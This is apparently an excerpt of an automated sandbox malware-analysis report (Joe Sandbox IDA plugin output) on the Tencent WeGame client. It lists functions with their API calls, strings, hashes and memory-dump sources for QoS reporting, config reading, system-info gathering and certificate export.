                                                                • API ID: ?get_log_instance@base@@Logger@1@$H_prolog3_$H_prolog3H_prolog3_catch_
                                                                • String ID: [qos_t] can`t find qos id for kind = %d$[qos_t]OfflineMode, disable real_report: %d.$[qos_t]id=%d report http to new server$[qos_t]id=%d report http to old server$[qos_t]id=%d report udp to new server$[qos_t]id=%d report udp to old server$e:\dailybuild_dev\wegame_client\codes\common\src\qos_command.cpp
                                                                • API String ID: 2885499593-3968730925
                                                                • Opcode ID: 8c34280c7ac8056cd03a6dcd3ba213db8ec4063cefd72fd92e4e70f24192f451
                                                                • Instruction ID: ce200d38535823ca8b8d9cd33c1d320e6f3c400e997466ea13c407b0e01cd66b
                                                                • Opcode Fuzzy Hash: 8c34280c7ac8056cd03a6dcd3ba213db8ec4063cefd72fd92e4e70f24192f451
                                                                • Instruction Fuzzy Hash: 5DE19270D00714DFCB14EFA4D891A9DB7B5AF05328F1041A8E9656F392DB3AAE05CBA4
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 6BD4A5B5 Relevance: 24.7, APIs: 10, Strings: 4, Instructions: 248COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • __EH_prolog3_GS.LIBCMT ref: 6BD4A5BF
                                                                  • Part of subcall function 6BD4A27E: __EH_prolog3_catch_GS.LIBCMT ref: 6BD4A288
                                                                  • Part of subcall function 6BD4A27E: ?is_absolute@path@filesystem@ierd_tgp@@QBE_NXZ.COMMON ref: 6BD4A2A5
                                                                  • Part of subcall function 6BD4A27E: ?current_path@filesystem@ierd_tgp@@YA?AVpath@12@XZ.COMMON(?), ref: 6BD4A2C0
                                                                  • Part of subcall function 6BD4A27E: ?absolute@filesystem@ierd_tgp@@YA?AVpath@12@ABV312@0@Z.COMMON(00000000,?,00000000,?), ref: 6BD4A2EE
                                                                • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON(?,?,?,?,00000000,00000200,6BD4A4EA,?,?,00000000,?,000000A0,6BD47025,?), ref: 6BD4A7CA
                                                                  • Part of subcall function 6BD447CC: __EH_prolog3.LIBCMT ref: 6BD447D3
                                                                • ??1?$basic_ios@DU?$char_traits@D@std@@@std@@UAE@XZ.MSVCP140(?,00000020,00000040,00000001,?,?,?,?,00000000,00000200,6BD4A4EA,?,?,00000000,?,000000A0), ref: 6BD4A7BD
                                                                  • Part of subcall function 6BD44967: __EH_prolog3.LIBCMT ref: 6BD4496E
                                                                  • Part of subcall function 6BD44967: ??0?$basic_ios@DU?$char_traits@D@std@@@std@@IAE@XZ.MSVCP140(00000008,6BD4A6BA,00000001,00000001,?,00000020,00000040,00000001,?,?,?,?,00000000,00000200,6BD4A4EA,?), ref: 6BD4498B
                                                                  • Part of subcall function 6BD44967: ??0?$basic_istream@DU?$char_traits@D@std@@@std@@QAE@PAV?$basic_streambuf@DU?$char_traits@D@std@@@1@_N@Z.MSVCP140(00000007,00000000,00000000,00000008,6BD4A6BA,00000001,00000001,?,00000020,00000040,00000001,?,?,?,?,00000000), ref: 6BD449A3
                                                                • ?decode_stream@common@ierd_tgp@@YA?AV?$optional@V?$reference_wrapper@V?$basic_istringstream@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@std@@@std@@AAV?$basic_istream@DU?$char_traits@D@std@@@4@AAV?$basic_istringstream@DU?$char_traits@D@std@@V?$allocator@D@2@@4@@Z.COMMON(?,?,?,00000001,00000001,?,00000020,00000040,00000001,?,?,?,?,00000000,00000200,6BD4A4EA), ref: 6BD4A6D3
                                                                  • Part of subcall function 6BD5EA3A: __EH_prolog3_GS.LIBCMT ref: 6BD5EA44
                                                                  • Part of subcall function 6BD5EA3A: ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@PAV?$basic_streambuf@DU?$char_traits@D@std@@@1@@Z.MSVCP140(00000008,00000002,00000001,000000BC,6BD4A6D8,?,?,?,00000001,00000001,?,00000020,00000040,00000001,?,?), ref: 6BD5EA74
                                                                  • Part of subcall function 6BD5EA3A: ?decode_string@common@ierd_tgp@@YA?AV?$optional@V?$reference_wrapper@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@std@@@std@@AAV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@4@@Z.COMMON(?,00000000,00000000), ref: 6BD5EA95
                                                                  • Part of subcall function 6BD5EA3A: ??1?$basic_ios@DU?$char_traits@D@std@@@std@@UAE@XZ.MSVCP140(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000094), ref: 6BD5EADC
                                                                • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON(?,?,?), ref: 6BD4A6E2
                                                                  • Part of subcall function 6BD1A5EF: __EH_prolog3.LIBCMT ref: 6BD1A5F6
                                                                  • Part of subcall function 6BD1E945: __EH_prolog3_catch_GS.LIBCMT ref: 6BD1E94C
                                                                • ??1?$basic_ios@DU?$char_traits@D@std@@@std@@UAE@XZ.MSVCP140(?,?,?), ref: 6BD4A76F
                                                                • ??1?$basic_ios@DU?$char_traits@D@std@@@std@@UAE@XZ.MSVCP140(?,?,?), ref: 6BD4A78A
                                                                • ?u16to8@common@ierd_tgp@@YA_NABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@AAV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@4@@Z.COMMON(?,00000000,?,?,?,00000000,00000200,6BD4A4EA,?,?,00000000,?,000000A0,6BD47025,?), ref: 6BD4A65F
                                                                  • Part of subcall function 6BDAB79E: __EH_prolog3_GS.LIBCMT ref: 6BDAB7A5
                                                                  • Part of subcall function 6BD49DEF: __EH_prolog3_catch_GS.LIBCMT ref: 6BD49DF9
                                                                  • Part of subcall function 6BD49DEF: ?u16to8@common@ierd_tgp@@YA_NABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@AAV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@4@@Z.COMMON(?,00000008,?,0000018C,6BD4A681,?,?,?,?,00000000,00000200,6BD4A4EA,?,?,00000000,?), ref: 6BD49E3C
                                                                  • Part of subcall function 6BD49DEF: ?exists@filesystem@ierd_tgp@@YA_NABVpath@12@@Z.COMMON(?,?,0000018C,6BD4A681,?,?,?,?,00000000,00000200,6BD4A4EA,?,?,00000000,?,000000A0), ref: 6BD49E50
                                                                • ?u16to8@common@ierd_tgp@@YA_NABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@AAV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@4@@Z.COMMON(?,00000000,?,?,?,00000000,00000200,6BD4A4EA,?,?,00000000,?,000000A0,6BD47025,?), ref: 6BD4A867
                                                                • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON(?,?,?,00000000,00000200,6BD4A4EA,?,?,00000000,?,000000A0,6BD47025,?), ref: 6BD4A87A
                                                                Strings
                                                                • e:\dailybuild_dev\wegame_client\codes\common\src\cfg_file_model.cpp, xrefs: 6BD4A706, 6BD4A7F6, 6BD4A89E
                                                                • [cfg_file_model]file not exist, path:%s, xrefs: 6BD4A819
                                                                • [cfg_file_model][read_cfg_tree]get_full_cfg_path failed, path:%s, xrefs: 6BD4A8C1
                                                                • [cfg_mgr][cfg_file]decode failed, path:%s, xrefs: 6BD4A729
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3338535311.000000006BD01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BD00000, based on PE: true
                                                                • Associated: 00000003.00000002.3338522371.000000006BD00000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338695743.000000006BF9D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338761936.000000006C081000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338775722.000000006C082000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338790575.000000006C084000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338805103.000000006C08C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338821002.000000006C08E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338835359.000000006C098000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338849899.000000006C0A0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_6bd00000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: U?$char_traits@$D@std@@D@std@@@std@@V?$allocator@$D@2@@4@@V?$basic_string@$??1?$basic_ios@$?get_log_instance@base@@?u16to8@common@ierd_tgp@@H_prolog3H_prolog3_H_prolog3_catch_Logger@1@U?$char_traits@_V?$allocator@_V?$basic_string@_W@2@@std@@W@std@@$D@2@@std@@@std@@@std@@V?$basic_istringstream@V?$basic_streambuf@V?$optional@V?$reference_wrapper@Vpath@12@$??0?$basic_ios@??0?$basic_istream@??6?$basic_ostream@?absolute@filesystem@ierd_tgp@@?current_path@filesystem@ierd_tgp@@?decode_stream@common@ierd_tgp@@?decode_string@common@ierd_tgp@@?exists@filesystem@ierd_tgp@@?is_absolute@path@filesystem@ierd_tgp@@D@std@@@1@@D@std@@@1@_D@std@@@4@V01@V312@0@V?$basic_istream@Vpath@12@@
                                                                • String ID: [cfg_file_model][read_cfg_tree]get_full_cfg_path failed, path:%s$[cfg_file_model]file not exist, path:%s$[cfg_mgr][cfg_file]decode failed, path:%s$e:\dailybuild_dev\wegame_client\codes\common\src\cfg_file_model.cpp
                                                                • API String ID: 3693779796-3530895154
                                                                • Opcode ID: 8b5e549754c4f0a08c1ad26402a48d404e3bf8e8d275d035b12320b282da92c4
                                                                • Instruction ID: 032bc29097e41ebfec82fe5648522838446e2bf0c77f4e494c87a99a2414b1b7
                                                                • Opcode Fuzzy Hash: 8b5e549754c4f0a08c1ad26402a48d404e3bf8e8d275d035b12320b282da92c4
                                                                • Instruction Fuzzy Hash: BBA1AD71C05248EEDF14DFA8CD85BDEBBB4AF25324F5440A8D144BB181EB789B48DBA1
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 6BDB2A44 Relevance: 24.6, APIs: 10, Strings: 4, Instructions: 130COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • __EH_prolog3_GS.LIBCMT ref: 6BDB2A4E
                                                                • memset.VCRUNTIME140(?,00000000,00000208,000006A0,6BD45FC3,?,6BFA11FC), ref: 6BDB2A65
                                                                • memset.VCRUNTIME140(?,00000000,00000410,?,00000000,00000208,000006A0,6BD45FC3,?,6BFA11FC), ref: 6BDB2A77
                                                                • SHGetFolderPathW.SHELL32(00000000,0000801A,00000000,00000000,?), ref: 6BDB2A8E
                                                                • ?get_client_version_type@overseas@ierd_tgp@@YAHXZ.COMMON ref: 6BDB2ACE
                                                                  • Part of subcall function 6BD8DDA8: ?get_client_id@util_client_info@ierd_tgp@@YAHXZ.COMMON(?,6BDB2AD3), ref: 6BD8DDAC
                                                                • ?get_client_version_type@overseas@ierd_tgp@@YAHXZ.COMMON ref: 6BDB2AE0
                                                                • swprintf.LIBCMT ref: 6BDB2B29
                                                                • ?exists@filesystem@ierd_tgp@@YA_NABVpath@12@AAVerror_code@std@@@Z.COMMON(?,00000000), ref: 6BDB2B67
                                                                • ?create_directory_ex@Sys_wrapper@common@ierd_tgp@@SA_NABVpath@filesystem@3@@Z.COMMON(?), ref: 6BDB2B79
                                                                • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON ref: 6BDB2BB1
                                                                  • Part of subcall function 6BD1A5EF: __EH_prolog3.LIBCMT ref: 6BD1A5F6
                                                                  • Part of subcall function 6BD1E945: __EH_prolog3_catch_GS.LIBCMT ref: 6BD1E94C
                                                                Strings
                                                                • e:\dailybuild_dev\wegame_client\codes\common\src\sys_wrapper.cpp, xrefs: 6BDB2BD5
                                                                • [Sys_wrapper]get appdata path failed, path %ws, hr 0x%08x, xrefs: 6BDB2BF4
                                                                • %s\Tencent\WeGame, xrefs: 6BDB2AE9
                                                                • %s\WeGameX, xrefs: 6BDB2AD9
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3338535311.000000006BD01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BD00000, based on PE: true
                                                                • Associated: 00000003.00000002.3338522371.000000006BD00000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338695743.000000006BF9D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338761936.000000006C081000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338775722.000000006C082000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338790575.000000006C084000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338805103.000000006C08C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338821002.000000006C08E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338835359.000000006C098000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338849899.000000006C0A0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_6bd00000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: ?get_client_version_type@overseas@ierd_tgp@@memset$?create_directory_ex@?exists@filesystem@ierd_tgp@@?get_client_id@util_client_info@ierd_tgp@@?get_log_instance@base@@FolderH_prolog3H_prolog3_H_prolog3_catch_Logger@1@PathSys_wrapper@common@ierd_tgp@@Verror_code@std@@@Vpath@12@Vpath@filesystem@3@@swprintf
                                                                • String ID: %s\Tencent\WeGame$%s\WeGameX$[Sys_wrapper]get appdata path failed, path %ws, hr 0x%08x$e:\dailybuild_dev\wegame_client\codes\common\src\sys_wrapper.cpp
                                                                • API String ID: 1556443052-2923592151
                                                                • Opcode ID: abbeb9a67a1871b9f3f308549bcfbdae208c94e66eeb50f7af705baf1b3defea
                                                                • Instruction ID: 941cc9689a9e09e130c8a093ef17b2fc769c5deaefedb3433987707f882dfde3
                                                                • Opcode Fuzzy Hash: abbeb9a67a1871b9f3f308549bcfbdae208c94e66eeb50f7af705baf1b3defea
                                                                • Instruction Fuzzy Hash: D14192B1951228AADB60DFB0CC85BCD7779AF55328F1001D9D509BB080EF3A9B95CF61
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 6BD23D44 Relevance: 24.6, APIs: 12, Strings: 2, Instructions: 94stringCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • memset.VCRUNTIME140(?,00000000,00000100), ref: 6BD23D70
                                                                • strcpy_s.API-MS-WIN-CRT-STRING-L1-1-0(?,00000100,?), ref: 6BD23D89
                                                                • CreateWindowExA.USER32(00000000,static,?,00000000,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 6BD23DC5
                                                                • SetLastError.KERNEL32(00000000), ref: 6BD23DD3
                                                                • SetWindowLongA.USER32(00000000,000000FC,?), ref: 6BD23DDD
                                                                • GetLastError.KERNEL32 ref: 6BD23DF0
                                                                • SetLastError.KERNEL32(00000000), ref: 6BD23DF8
                                                                • SetWindowLongA.USER32(00000000,000000EB), ref: 6BD23E02
                                                                • GetLastError.KERNEL32 ref: 6BD23E0C
                                                                • DestroyWindow.USER32(00000000), ref: 6BD23E13
                                                                • ShowWindow.USER32(00000000,00000000), ref: 6BD23E20
                                                                • UpdateWindow.USER32(00000000), ref: 6BD23E27
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3338535311.000000006BD01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BD00000, based on PE: true
                                                                • Associated: 00000003.00000002.3338522371.000000006BD00000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338695743.000000006BF9D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338761936.000000006C081000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338775722.000000006C082000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338790575.000000006C084000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338805103.000000006C08C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338821002.000000006C08E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338835359.000000006C098000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338849899.000000006C0A0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_6bd00000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: Window$ErrorLast$Long$CreateDestroyShowUpdatememsetstrcpy_s
                                                                • String ID: TCLS_CORE_WND_%u$static
                                                                • API String ID: 698125720-2282508738
                                                                • Opcode ID: a945d94e00d8aa858c479c8cb4448e1ae9f68f59d2e76f36d6814b7ff8bd6f23
                                                                • Instruction ID: ceaa15d641aad4fc7dbed40433682012e7edffd820a974747d4b51f1d5a7eb3c
                                                                • Opcode Fuzzy Hash: a945d94e00d8aa858c479c8cb4448e1ae9f68f59d2e76f36d6814b7ff8bd6f23
                                                                • Instruction Fuzzy Hash: 232129B5650215BFDB207B698C49F6F37ACDF0A724F100155BE04E6180DA78DD0987B1
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 0045A68D Relevance: 23.1, APIs: 11, Strings: 2, Instructions: 305COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • __EH_prolog3_GS.LIBCMT ref: 0045A697
                                                                  • Part of subcall function 0045A5FA: __EH_prolog3.LIBCMT ref: 0045A601
                                                                • ?get_graphic_card_name@Sys_wrapper@common@ierd_tgp@@SAXAAV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@Z.COMMON(?,00000001,000000C4,0045A022,00000000,00000000,00000000,00000000), ref: 0045A711
                                                                • ?get_ie_version@Sys_wrapper@common@ierd_tgp@@SAXAAV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@Z.COMMON(?,?,00000001,000000C4,0045A022,00000000,00000000,00000000,00000000), ref: 0045A71D
                                                                • ?get_cpu_name@Sys_wrapper@common@ierd_tgp@@SAXAAV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@Z.COMMON(?,?,?,00000001,000000C4,0045A022,00000000,00000000,00000000,00000000), ref: 0045A726
                                                                  • Part of subcall function 00420E50: memmove.VCRUNTIME140(00000000,00000000,00000000,00420411,00000000,00000000,00000000,?,00423F52,00000000,00000001), ref: 00420E77
                                                                • ?extract_op_from_cmd@Sys_wrapper@common@ierd_tgp@@SA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@PAH@Z.COMMON(?,?,StartFor,00000008), ref: 0045A768
                                                                  • Part of subcall function 00420E50: memmove.VCRUNTIME140(00000000,00000000,00000000,00420411,00000000,00000000,00000000,?,00423F52,00000000,00000001), ref: 00420F1B
                                                                • ?extract_op_from_cmd@Sys_wrapper@common@ierd_tgp@@SA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@PAH@Z.COMMON(?,?,IsHide,00000006,StartFor,00000008), ref: 0045A7B0
                                                                  • Part of subcall function 00420C80: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,0043E0C9,85A35C35,?,?,?,00474220,000000FF,?,0043E01E,85A35C35,?,?,?,004741CF,000000FF), ref: 00420CC5
                                                                • ?IsLaptop@Sys_wrapper@common@ierd_tgp@@SA_NXZ.COMMON ref: 0045A814
                                                                • ?get_system_name@Sys_wrapper@common@ierd_tgp@@SA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@XZ.COMMON(?), ref: 0045A8A1
                                                                • ?get_system_hardware@Sys_wrapper@common@ierd_tgp@@SA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@XZ.COMMON(?), ref: 0045A8C3
                                                                • ?GetAllDriveInfo@Sys_wrapper@common@ierd_tgp@@SAXPAV?$vector@UDriveInfo@common@ierd_tgp@@V?$allocator@UDriveInfo@common@ierd_tgp@@@std@@@std@@@Z.COMMON(?), ref: 0045A959
                                                                  • Part of subcall function 0043D7E0: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0043D8C7
                                                                  • Part of subcall function 0045381E: __EH_prolog3_GS.LIBCMT ref: 00453825
                                                                • ?get_system_all_build_version@Sys_wrapper@common@ierd_tgp@@SA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@XZ.COMMON(?), ref: 0045AA4C
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3337069319.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.3337056625.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337123935.000000000047D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337148162.00000000004A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337161820.00000000004A5000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337176233.00000000004A7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337189589.00000000004AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: Sys_wrapper@common@ierd_tgp@@$V?$allocator@$D@std@@U?$char_traits@V?$basic_string@$D@2@@std@@$D@2@@std@@@Drive$?extract_op_from_cmd@H_prolog3__invalid_parameter_noinfo_noreturnmemmove$?get_cpu_name@?get_graphic_card_name@?get_ie_version@?get_system_all_build_version@?get_system_hardware@?get_system_name@H_prolog3Info@Info@common@ierd_tgp@@Info@common@ierd_tgp@@@std@@@std@@@Laptop@V?$vector@
                                                                • String ID: IsHide$StartFor
                                                                • API String ID: 4053751387-3908033177
                                                                • Opcode ID: f8a40af976fb41b53c000b5f6fcfaad7d6ef4c6ca3d8e0e4b92eec0f34bbbece
                                                                • Instruction ID: b60e98f27a45211a085c819fb708336576ee98536815641e2a4e8a53d4cf5772
                                                                • Opcode Fuzzy Hash: f8a40af976fb41b53c000b5f6fcfaad7d6ef4c6ca3d8e0e4b92eec0f34bbbece
                                                                • Instruction Fuzzy Hash: 62D128B1D012589EDF51DBA5C845BDEBBF8AF08304F14419EE449E3242EB785B88CF66
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 00461233 Relevance: 22.9, APIs: 9, Strings: 4, Instructions: 189COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • __EH_prolog3_GS.LIBCMT ref: 0046123D
                                                                • ?is_certificate_open@util_curl_certificate@ierd_tgp@@YA_NXZ.COMMON(00000110,00464E97,00000070,0045A152), ref: 00461242
                                                                • ?get_workingdir_path_ex@Application@common@ierd_tgp@@SA?AVpath@filesystem@3@XZ.COMMON(?,00000110,00464E97,00000070,0045A152), ref: 00461256
                                                                  • Part of subcall function 0045CBE9: __EH_prolog3_GS.LIBCMT ref: 0045CBF0
                                                                  • Part of subcall function 0045CBE9: ??_0path@filesystem@ierd_tgp@@QAEAAV012@ABV012@@Z.COMMON(?,00000024,00463EB7,?,00000000,?,?,log), ref: 0045CC20
                                                                  • Part of subcall function 0040BBD0: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,0040E902,?,?), ref: 0040BC1D
                                                                  • Part of subcall function 0046C98B: __EH_prolog3.LIBCMT ref: 0046C992
                                                                • ?u16_to_loc@common@ierd_tgp@@YA_NABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@AAV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@4@@Z.COMMON(00000000,?,?,?,?,wegamex_client.pfx,?,?,wegamex_client.key), ref: 0046135B
                                                                • ?u16_to_loc@common@ierd_tgp@@YA_NABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@AAV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@4@@Z.COMMON(00000000,?,?,?,?,?,wegamex_client.pfx,?,?,wegamex_client.key), ref: 00461386
                                                                • ?u16_to_loc@common@ierd_tgp@@YA_NABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@AAV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@4@@Z.COMMON(00000000,?,?,?,?,?,?,wegamex_client.pfx,?,?,wegamex_client.key), ref: 004613B1
                                                                • ?get_cert_pwd@util_curl_certificate@ierd_tgp@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@XZ.COMMON(?,?,?,?,?,?,wegamex_client.pfx,?,?,wegamex_client.key), ref: 004613C8
                                                                • ?export_crt_file@util_curl_certificate@ierd_tgp@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@000@Z.COMMON(?,?,?,00000000,?,?,?,?,?,?,wegamex_client.pfx,?,?,wegamex_client.key), ref: 004613DE
                                                                • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON(?,?,?,?,?,?,?,wegamex_client.pfx,?,?,wegamex_client.key), ref: 004613FD
                                                                  • Part of subcall function 0043DF1B: __EH_prolog3.LIBCMT ref: 0043DF22
                                                                  • Part of subcall function 0043F4BB: __EH_prolog3_catch_GS.LIBCMT ref: 0043F4C2
                                                                Strings
                                                                • wegamex_client.pfx, xrefs: 004612D0
                                                                • wegamex_client.key, xrefs: 00461299
                                                                • [export_curl_crt_file]export fail!, xrefs: 00461438
                                                                • e:\dailybuild_dev\wegame_client\codes\main\tgp_daemon\src\tgp_daemon_main.cpp, xrefs: 00461421
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3337069319.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.3337056625.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337123935.000000000047D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337148162.00000000004A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337161820.00000000004A5000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337176233.00000000004A7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337189589.00000000004AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: D@std@@U?$char_traits@V?$allocator@V?$basic_string@$?u16_to_loc@common@ierd_tgp@@D@2@@4@@U?$char_traits@_V?$allocator@_V?$basic_string@_W@2@@std@@W@std@@$H_prolog3H_prolog3_$??_0path@filesystem@ierd_tgp@@?export_crt_file@util_curl_certificate@ierd_tgp@@?get_cert_pwd@util_curl_certificate@ierd_tgp@@?get_log_instance@base@@?get_workingdir_path_ex@?is_certificate_open@util_curl_certificate@ierd_tgp@@Application@common@ierd_tgp@@D@2@@std@@D@2@@std@@000@H_prolog3_catch_Logger@1@V012@V012@@Vpath@filesystem@3@_invalid_parameter_noinfo_noreturn
                                                                • String ID: [export_curl_crt_file]export fail!$e:\dailybuild_dev\wegame_client\codes\main\tgp_daemon\src\tgp_daemon_main.cpp$wegamex_client.key$wegamex_client.pfx
                                                                • API String ID: 270246835-1423282653
                                                                • Opcode ID: aad0359ddd4f449f1bb56a4fd147f06ddb8aabccddd486f8f86be872d05552e3
                                                                • Instruction ID: c83ac1de4baf7c9beaab7fc8125d9720d6837698e3f0e79ffc09f8b31f95bc01
                                                                • Opcode Fuzzy Hash: aad0359ddd4f449f1bb56a4fd147f06ddb8aabccddd486f8f86be872d05552e3
                                                                • Instruction Fuzzy Hash: AD71B071C0524CDECB05EBE5C851BCDBBB8AF15304F5440AEE045B7182EB782B49DB6A
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 6BD47553 Relevance: 21.3, APIs: 9, Strings: 3, Instructions: 274COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • __EH_prolog3_catch_GS.LIBCMT ref: 6BD4755D
                                                                  • Part of subcall function 6BD19A0E: __EH_prolog3.LIBCMT ref: 6BD19A15
                                                                • ?root_full_path@File_info@common@ierd_tgp@@SA?AVpath@filesystem@3@XZ.COMMON(?,000001E8,6BD470FC,?,?), ref: 6BD47589
                                                                  • Part of subcall function 6BD4885B: __EH_prolog3_GS.LIBCMT ref: 6BD48865
                                                                  • Part of subcall function 6BD4885B: ?get_cfg_module_path@File_info@common@ierd_tgp@@SA?AVpath@filesystem@3@XZ.COMMON(?,0000008C,6BD4758E,?,000001E8,6BD470FC,?,?), ref: 6BD4887F
